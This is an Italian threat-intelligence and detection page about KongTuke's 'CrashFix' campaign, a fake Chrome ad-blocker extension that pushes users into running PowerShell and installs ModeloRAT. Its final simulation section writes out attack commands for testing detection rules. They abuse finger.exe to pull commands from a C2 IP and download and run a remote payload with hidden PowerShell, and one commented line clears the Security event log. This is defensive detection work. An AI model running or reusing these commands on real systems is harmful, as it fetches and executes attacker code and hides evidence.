Dissezionare CrashFix: Il Nuovo Giocattolo di KongTuke
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
KongTuke ha distribuito un’estensione maligna di Chrome, NexShield, imitando uBlock Origin Lite. Una volta installata, visualizza un avviso di sicurezza “CrashFix” per simulare un incidente di sicurezza del browser legittimo, blocca il browser e costringe l’utente a eseguire un comando PowerShell malevolo copiato negli appunti. La campagna distribuisce un RAT in Python, ModeloRAT, su sistemi collegati al dominio e una catena PowerShell a più stadi su host stand-alone.
Indagine
Gli analisti di Huntress hanno esaminato il codice dell’estensione, collegato il comando e controllo a nexsnield.com e effettuato il reverse engineering dei payload. Hanno osservato un abuso di finger.exe come LOLBin per recuperare le istruzioni degli attaccanti, oltre a un DGA che genera domini .top. Per gli ambienti su dominio, i ricercatori hanno identificato un impianto Python cifrato RC4 che persiste tramite la chiave HKCU Run. Altre tecniche includevano controlli anti-analisi, Bypass di AMSI, e tattiche di esaurimento delle risorse intese a indurre gli utenti a conformarsi rapidamente.
Mitigazione
Bloccare l’ID dell’estensione di Chrome e monitorare le estensioni sconosciute che impersonano noti blocca-pubblicità. Rilevare il beaconing verso nexsnield.com, gli IP C2 e domini prodotti dal DGA. Applicare il controllo dell’esecuzione per limitare l’uso di LOLBin (incluso finger.exe) e allertare su valori Run-key sospetti, specialmente nomi progettati per somigliare a software ampiamente utilizzati.
Risposta
Allertare sulle installazioni di estensioni relative a NexShield e correlare con connessioni in uscita verso l’infrastruttura C2 e DGA identificata. Isolare gli host colpiti e raccogliere artefatti delle estensioni, chiavi di registro di Run, task schedulati e file scaricati. Rimuovere la persistenza di ModeloRAT, eradicare i componenti degli stadi PowerShell e rimedialee validare l’endpoint.
Flusso di attacco
Rilevamenti
Chiamata a Metodi .NET Sospetti tramite PowerShell (via powershell)
Visualizza
Uso Sospetto di CURL (via cmdline)
Visualizza
Nome Breve del File (via cmdline)
Visualizza
Possibile Operazione Manuale o di Scripting Eseguita in Cartelle Insolite (via cmdline)
Visualizza
Stringhe PowerShell Sospette (via powershell)
Visualizza
Chiamata a Funzioni API di Windows Sospette da PowerShell (via powershell)
Visualizza
Possibili Punti di Persistenza [ASEPs – Software/NTUSER Hive] (via registry_event)
Visualizza
Un Archivio è Stato Estratto in una Directory Sospetta con PowerShell (via powershell)
Visualizza
Esecuzione di Python da Cartelle Sospette (via cmdline)
Visualizza
Possibili Indicatori di Offuscamento PowerShell (via powershell)
Visualizza
Possibile Enumerazione del Sistema (via cmdline)
Visualizza
Download o Upload tramite PowerShell (via cmdline)
Visualizza
IOCs (SourceIP) per rilevare: Analisi di CrashFix: Il Nuovo Giocattolo di KongTuke
Visualizza
IOCs (HashSha256) per rilevare: Analisi di CrashFix: Il Nuovo Giocattolo di KongTuke
Visualizza
IOCs (DestinationIP) per rilevare: Analisi di CrashFix: Il Nuovo Giocattolo di KongTuke
Visualizza
IOCs (Email) per rilevare: Analisi di CrashFix: Il Nuovo Giocattolo di KongTuke
Visualizza
Rileva l’Esecuzione di Comandi Malevoli di KongTuke CrashFix [Creazione Processo di Windows]
Visualizza
Rilevamento del Bypass di AMSI e Rimozione di Evidenze tramite PowerShell [Windows Powershell]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Prevolo di Telemetria & Baseline deve essere passato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento.
-
Narrativa dell’Attacco e Comandi:
L’avversario prima copia il legittimofinger.exebinario nella directory temporanea, lo rinomina comect.exe, e poi utilizza una catena nidificatacmd /cper invocare il binario copiato con un argomento elaborato che contatta un server remoto C2 (199.217.98.108). Il binario trasmette il payload al prompt dei comandi, che viene quindi indirizzato in un secondocmdcmdInvoke‑WebRequeste lo esegue immediatamente coniex. Tutti i passaggi sono eseguiti con un’interfaccia utente minima (/min) per evitare il rilevamento da parte dell’utente.1. Copia finger.exe → %TEMP%ct.exe 2. Esegui: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd" 3. Download & esecuzione di payload secondari con PowerShell: powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content" -
Script di Test di Regressione: Lo script qui sotto riproduce l’intera catena di attacco su una macchina di test Windows. Eseguire in una sessione PowerShell elevata.
#------------------------------------------------- # Esecuzione di Comandi Malevoli KongTuke CrashFix #------------------------------------------------- # 1. Distribuire il LOLBin (finger.exe) in %TEMP% come ct.exe $fingerPath = "$env:windirsystem32finger.exe" $tempExe = "$env:TEMPct.exe" Copy-Item -Path $fingerPath -Destination $tempExe -Force # 2. Eseguire la catena cmd malevola (corrisponde alla regola Sigma) $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"' Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden # 3. Download web tramite PowerShell ed esecuzione del payload secondario $payloadUrl = 'http://199.217.98.108/payload.ps1' $psCommand = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content" Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden #------------------------------------------------- -
Comandi di Pulizia: Rimuovere gli artefatti e terminare eventuali processi residui creati dal test.
# Elimina il ct.exe copiato Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue # Uccidi eventuali processi cmd.exe o powershell.exe rimasti avviati dal test (filtra per riga di comando specifica) Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } | ForEach-Object { $_.Terminate() } # Opzionale: cancella Log Eventi se necessario per ripetibilità # wevlutil cl Security